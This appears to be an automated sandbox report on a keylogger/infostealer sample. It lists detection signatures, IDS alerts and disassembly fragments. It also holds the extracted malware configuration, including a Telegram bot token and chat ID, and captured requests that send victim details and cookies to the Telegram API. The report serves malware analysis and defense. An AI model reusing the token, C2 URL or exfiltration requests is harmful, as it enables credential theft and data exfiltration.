0.3.x8M2g1Xxhz.exe.91dab0.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d5fb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cc9e:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cefb:$a4: \Orbitum\User Data\Default\Login Data 0x3d8da:$a5: \Kometa\User Data\Default\Login Data
0.3.x8M2g1Xxhz.exe.91dab0.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31464:$s1: UnHook 0x31400:$s2: SetHook 0x31439:$s3: CallNextHook 0x313c8:$s4: _hook
0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e31b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d9be:$a3: \Google\Chrome\User Data\Default\Login Data 0x3dc1b:$a4: \Orbitum\User Data\Default\Login Data 0x3e5fa:$a5: \Kometa\User Data\Default\Login Data
0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31464:$s1: UnHook 0x31400:$s2: SetHook 0x31439:$s3: CallNextHook 0x313c8:$s4: _hook
0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32184:$s1: UnHook 0x32120:$s2: SetHook 0x32159:$s3: CallNextHook 0x320e8:$s4: _hook
0.2.x8M2g1Xxhz.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d8b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6B 88 44 24 2B 88 44 24 2F B0 38 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1f58a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1f1d0:$s5: delete[] 0x1e688:$s6: constructor or from DllMain.
Click to see the 74 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:08:33.448383+0100	2803305	3	Unknown Traffic	192.168.2.9	49759	104.21.112.1	443	TCP
2025-01-11T08:08:36.861925+0100	2803305	3	Unknown Traffic	192.168.2.9	49784	104.21.112.1	443	TCP
2025-01-11T08:08:37.928318+0100	2803305	3	Unknown Traffic	192.168.2.9	49792	104.21.112.1	443	TCP
2025-01-11T08:08:38.983490+0100	2803305	3	Unknown Traffic	192.168.2.9	49802	104.21.112.1	443	TCP
2025-01-11T08:08:40.057813+0100	2803305	3	Unknown Traffic	192.168.2.9	49809	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:08:31.701907+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49747	193.122.130.0	80	TCP
2025-01-11T08:08:32.842548+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49747	193.122.130.0	80	TCP
2025-01-11T08:08:34.093331+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49761	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:08:49.297232+0100	1810008	1	Potentially Bad Traffic	192.168.2.9	49874	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:08:42.078227+0100	1810007	1	Potentially Bad Traffic	192.168.2.9	49824	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: x8M2g1Xxhz.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE", "Chat_id": "5830304904", "Version": "4.4"}
Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE", "Chat id": "5830304904"}
Source: x8M2g1Xxhz.exe.7664.0.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendMessage"}

Multi AV Scanner detection for submitted file

Source: x8M2g1Xxhz.exe	Virustotal: Detection: 59%			Perma Link
Source: x8M2g1Xxhz.exe	ReversingLabs: Detection: 87%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: x8M2g1Xxhz.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: x8M2g1Xxhz.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49753 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49824 version: TLS 1.2

Source:

Binary string: _.pdb source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0471FB20h	0_2_0471F962
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0471FB20h	0_2_0471FB6F
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08300F50h	0_2_08300D70
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 083018DAh	0_2_08300D70
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 083031BEh	0_2_08302DA0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0830D5F4h	0_2_0830D348
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08302A74h	0_2_083027C0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0830E2FCh	0_2_0830E050
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0830E754h	0_2_0830E4A8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 083031BEh	0_2_083030EC
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0830EBACh	0_2_0830E900
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0830F004h	0_2_0830ED58
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0830F45Ch	0_2_0830F1B0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 083031BEh	0_2_08302D92
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0830F8B4h	0_2_0830F608
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	0_2_08300273
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0830FD0Ch	0_2_0830FA60
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0830D19Ch	0_2_0830CEF0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0830DA4Ch	0_2_0830D7A0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0830DEA4h	0_2_0830DBF8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085196EBh	0_2_08519418
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08518320h	0_2_08517FE0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08511CFCh	0_2_08511A50
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851BB21h	0_2_0851B850
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851E911h	0_2_0851E640
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085102ECh	0_2_08510040
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851DB49h	0_2_0851D878
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851370Ch	0_2_08513460
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851C8E9h	0_2_0851C618
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085132B4h	0_2_08513008
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851F6D9h	0_2_0851F408
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085162E4h	0_2_08516038
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08515184h	0_2_08514ED8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08517584h	0_2_085172D8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851EDA9h	0_2_0851EAD8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08510B9Ch	0_2_085108F0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08516B96h	0_2_085168E8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851BFB9h	0_2_0851BCE8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851673Ch	0_2_08516490
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08510744h	0_2_08510498
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851712Ch	0_2_08516E80
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08514D2Ch	0_2_08514A80
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851CD81h	0_2_0851CAB0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08513B64h	0_2_085138B8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851FB71h	0_2_0851F8A0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08512154h	0_2_08511EA8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08512A04h	0_2_08512758
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851D219h	0_2_0851CF48
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08510FF4h	0_2_08510D48
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851F241h	0_2_0851EF70
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851DFE1h	0_2_0851DD10
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then mov esp, ebp	0_2_0851B11A
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085125ACh	0_2_08512300
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085179DCh	0_2_08517730
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085155DCh	0_2_08515330
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085118A4h	0_2_085115F8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08515E8Ch	0_2_08515BE0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851D6B1h	0_2_0851D3E0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851C451h	0_2_0851C180
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08517E34h	0_2_08517B88
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08515A34h	0_2_08515788
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08512E5Ch	0_2_08512BB0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851B689h	0_2_0851B3B8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851144Ch	0_2_085111A0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0851E479h	0_2_0851E1A8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085863EAh	0_2_08586078
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08586A1Bh	0_2_08586720
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08581E7Ah	0_2_08581BD0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858F4C3h	0_2_0858F1C8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08582C29h	0_2_08582958
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08584321h	0_2_08584050
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858D34Bh	0_2_0858D050
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08585A19h	0_2_08585748
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858A843h	0_2_0858A548
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08580311h	0_2_08580040
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08587D3Bh	0_2_08587A40
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08587873h	0_2_08587578
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08580C41h	0_2_08580970
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858E66Bh	0_2_0858E370
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858BB63h	0_2_0858B868
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858905Bh	0_2_08588D60
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085850E9h	0_2_08584E18
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858D813h	0_2_0858D518
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858AD0Bh	0_2_0858AA10
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085810D9h	0_2_08580E08
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08588203h	0_2_08587F08
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858EFFBh	0_2_0858ED00
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08581A09h	0_2_08581738
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858EB33h	0_2_0858E838
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858C02Bh	0_2_0858BD30
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085822F9h	0_2_08582028
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08589523h	0_2_08589228
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085839F1h	0_2_08583720
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085807A9h	0_2_085804D8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858B1D3h	0_2_0858AED8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085886CBh	0_2_085883D0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858C9BBh	0_2_0858C6C0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08582791h	0_2_085824C0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858C4F3h	0_2_0858C1F8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085830C1h	0_2_08582DF0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085899EBh	0_2_085896F0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08586EE3h	0_2_08586BE8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085847B9h	0_2_085844E8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858DCDBh	0_2_0858D9E0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08585EB1h	0_2_08585BE0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08588B93h	0_2_08588898
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858F98Bh	0_2_0858F690
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08583559h	0_2_08583288
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858CE83h	0_2_0858CB88
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08584C52h	0_2_08584980
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858A37Bh	0_2_0858A080
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08583E89h	0_2_08583BB8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08589EB3h	0_2_08589BB8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08585581h	0_2_085852B0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085873ABh	0_2_085870B0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858E1A3h	0_2_0858DEA8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 08581571h	0_2_085812A0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 0858B69Bh	0_2_0858B3A0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085B24BBh	0_2_085B21C0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085B033Bh	0_2_085B0040
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085B1B2Bh	0_2_085B1830
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085B1FF3h	0_2_085B1CF8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085B119Bh	0_2_085B0EA0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085B1663h	0_2_085B1368
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085B0803h	0_2_085B0508
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then jmp 085B0CCCh	0_2_085B09D0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_085F50F8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_085F69C9
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_085F6F48
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_085F6F74
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_085F6268
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_085F6266
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_085F663E
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_085F1C90
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_085F1C8A
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_085F1FA9
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_085F50E9
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	0_2_085F7206

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49874 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49824 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:14:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendDocument?chat_id=5830304904&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd329d9dfe367aHost: api.telegram.orgContent-Length: 1277

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49747 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49761 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49759 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49802 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49784 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49792 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49809 -> 104.21.112.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
